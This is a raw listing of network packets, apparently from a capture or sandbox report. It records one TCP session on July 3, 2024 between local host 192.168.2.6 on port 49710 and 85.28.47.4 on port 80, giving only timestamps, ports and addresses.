Jul 3, 2024 18:08:40.855669975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.855827093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855839014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855850935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855863094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855875015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.855875015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855886936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855900049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.855917931 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856055021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856066942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856079102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856090069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856101990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856101990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856113911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856117964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856136084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856159925 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856251001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856262922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856273890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856296062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856318951 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856379986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856391907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856403112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856412888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856425047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856426001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856436014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856446981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856453896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856461048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856472015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856479883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856492043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856503963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856515884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856534958 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856554985 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856693983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856735945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856807947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856820107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856831074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856837034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856848001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856856108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856880903 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.856942892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856954098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.856980085 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.857003927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.857075930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857086897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857098103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857110977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857120991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857124090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.857132912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857142925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857152939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857152939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.857162952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857172966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.857173920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857187033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857204914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.857230902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.857438087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857449055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857460976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857472897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857481003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.857505083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.857551098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.857595921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.861819983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.861850977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.861865997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.861872911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.861890078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.861905098 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.861946106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.861958027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.861968994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.861979961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.861984968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862011909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862075090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862086058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862112999 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862229109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862240076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862251043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862267017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862274885 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862277985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862288952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862291098 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862299919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862317085 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862341881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862363100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862375021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862385988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862413883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862451077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862489939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862543106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862554073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862565041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862576962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862584114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862588882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862608910 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862627029 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862726927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862737894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862749100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862760067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862762928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862771034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862778902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862781048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862792015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862803936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862803936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862833023 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862876892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862889051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862925053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862925053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862941027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862965107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.862974882 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862983942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.862998962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863009930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863022089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863032103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863054991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863080025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863198996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863210917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863221884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863234043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863245010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863250017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863255978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863266945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863272905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863279104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863290071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863291025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863301992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863308907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863323927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863348007 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863415956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863456964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863459110 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863468885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863492966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863508940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863581896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863594055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863605976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863616943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863627911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863655090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863765001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863775015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863786936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863799095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863802910 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863811970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863821030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.863827944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.863853931 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.945920944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.945934057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946010113 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946043968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946055889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946099043 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946171999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946212053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946249008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946260929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946271896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946283102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946293116 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946295023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946327925 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946369886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946408033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946554899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946566105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946577072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946588039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946594954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946620941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946736097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946751118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946762085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946773052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946779966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946806908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.946862936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946875095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.946911097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947047949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947058916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947069883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947081089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947092056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947094917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947103024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947119951 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947139025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947189093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947201967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947212934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947223902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947237015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947263956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947408915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947448015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947601080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947611094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947623968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947633982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947643995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947644949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947659016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947669983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947670937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947681904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947689056 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947693110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947704077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.947717905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.947746992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.948045969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.948055983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.948091984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.977889061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.982803106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.154886961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.154927015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.154948950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.154973030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.154983044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155015945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155025959 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155050993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155056953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155093908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155136108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155181885 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155185938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155220032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155226946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155251980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155265093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155287027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155328035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155337095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155369997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155385017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155414104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155436993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155471087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155482054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155504942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155519009 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155539036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155587912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155590057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155636072 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155638933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155673981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155693054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155716896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155725002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155756950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155770063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155790091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155803919 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155827999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155836105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155860901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155875921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.155896902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.155939102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156073093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156117916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156122923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156160116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156171083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156194925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156203032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156229019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156238079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156261921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156271935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156295061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156316996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156327963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156341076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156362057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156394958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156404018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156416893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156440973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156445980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156512976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156541109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156547070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156559944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156582117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156596899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156616926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156631947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156650066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156687021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156697035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156735897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156769991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156786919 CEST	49710	80	192.168.2.6	85.28.47.4
